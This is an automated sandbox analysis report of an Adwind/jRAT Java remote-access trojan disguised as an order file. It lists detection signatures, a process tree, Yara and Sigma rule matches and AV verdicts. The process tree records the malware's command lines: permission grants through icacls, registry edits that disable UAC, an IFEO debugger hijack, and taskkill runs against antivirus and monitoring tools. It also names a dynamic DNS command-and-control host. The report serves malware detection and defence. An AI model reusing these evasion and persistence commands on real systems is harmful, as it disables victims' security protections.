Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NewOrder - P2D041197.jar

Overview

General Information

Sample name:NewOrder - P2D041197.jar
Analysis ID:1427166
MD5:bc34f4e23dca52ed6425b46a3dcf5e95
SHA1:e82affa4fea489146e3deb803efdb561a394073f
SHA256:f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
Tags:Adwindjar
Infos:

Detection

ADWIND
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Processes Spawned by Java.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 7388 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • icacls.exe (PID: 7440 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7484 cmdline: wscript C:\Users\user\zbrspjjraf.js MD5: FF00E0480075B095948000BDC66E81F0)
        • javaw.exe (PID: 7564 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" MD5: 6E0F4F812AE02FBCB744A929E74A04B8)
          • java.exe (PID: 7620 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7788 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cscript.exe (PID: 7844 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
            • cmd.exe (PID: 7964 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cscript.exe (PID: 8012 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
            • xcopy.exe (PID: 8120 cmdline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7712 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cscript.exe (PID: 7768 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 7896 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cscript.exe (PID: 7940 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • xcopy.exe (PID: 8072 cmdline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7236 cmdline: cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5788 cmdline: taskkill /IM UserAccountControlSettings.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7264 cmdline: cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • regedit.exe (PID: 7408 cmdline: regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg MD5: BD63D72DB4FA96A1E0250B1D36B7A827)
          • taskkill.exe (PID: 8048 cmdline: taskkill /IM ProcessHacker.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8068 cmdline: taskkill /IM procexp.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 796 cmdline: taskkill /IM MSASCui.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1436 cmdline: taskkill /IM MsMpEng.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5308 cmdline: taskkill /IM MpUXSrv.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7348 cmdline: taskkill /IM MpCmdRun.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7444 cmdline: WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 2504 cmdline: taskkill /IM NisSrv.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 4348 cmdline: taskkill /IM ConfigSecurityPolicy.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8000 cmdline: taskkill /IM procexp.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1608 cmdline: taskkill /IM wireshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5844 cmdline: taskkill /IM tshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8104 cmdline: taskkill /IM text2pcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5460 cmdline: taskkill /IM rawshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7264 cmdline: taskkill /IM mergecap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7968 cmdline: taskkill /IM editcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6160 cmdline: taskkill /IM dumpcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6856 cmdline: taskkill /IM capinfos.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 3524 cmdline: taskkill /IM mbam.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6192 cmdline: taskkill /IM mbamscheduler.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6908 cmdline: taskkill /IM mbamservice.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1004 cmdline: taskkill /IM AdAwareService.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.classMAL_JRAT_Oct18_1Detects JRAT malwareFlorian Roth
  • 0x36507:$x1: /JRat.class
  • 0x3af09:$x1: /JRat.class
C:\Users\user\AppData\Roaming\krmyqqmohp.txtMAL_JRAT_Oct18_1Detects JRAT malwareFlorian Roth
  • 0x37c41:$x1: /JRat.class
  • 0x76646:$x1: /JRat.class
C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    6.2.javaw.exe.73a90000.3.unpackJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security
      7.2.java.exe.a744bf4.11.raw.unpackJoeSecurity_AdWind_dllYara detected AdWind RAT\'s dllJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Adwind RAT / JRAT File Artifact
        Source: File createdAuthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community: Data: EventID: 11, Image: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe, ProcessId: 7564, TargetFilename: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Sigma detected: Potential Attachment Manager Settings Associations Tamper
        Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Details: .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regedit.exe, ProcessId: 7408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7712, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ProcessId: 7768, ProcessName: cscript.exe
        Sigma detected: Suspicious Processes Spawned by Java.EXE
        Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Florian Roth: Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7712, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ProcessId: 7768, ProcessName: cscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe
        Sigma detected: CurrentVersion NT Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regedit.exe, ProcessId: 7408, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\debugger
        Sigma detected: Shell Process Spawned by Java.EXE
        Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: Data: Command: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, CommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7620, ParentProcessName: java.exe, ProcessCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, ProcessId: 7788, ProcessName: cmd.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsAvira: detection malicious, Label: VBS/Antiav.jre
        Source: C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbsAvira: detection malicious, Label: VBS/Agent.281
        Source: C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbsAvira: detection malicious, Label: VBS/Agent.281
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllAvira: detection malicious, Label: TR/Spy.Agent.lusda
        Source: C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbsAvira: detection malicious, Label: VBS/Antiav.jre
        Multi AV Scanner detection for domain / URL
        Source: pnauco5.ddns.netVirustotal: Detection: 5%Perma Link
        Source: https://jrat.ioVirustotal: Detection: 6%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllVirustotal: Detection: 79%Perma Link
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
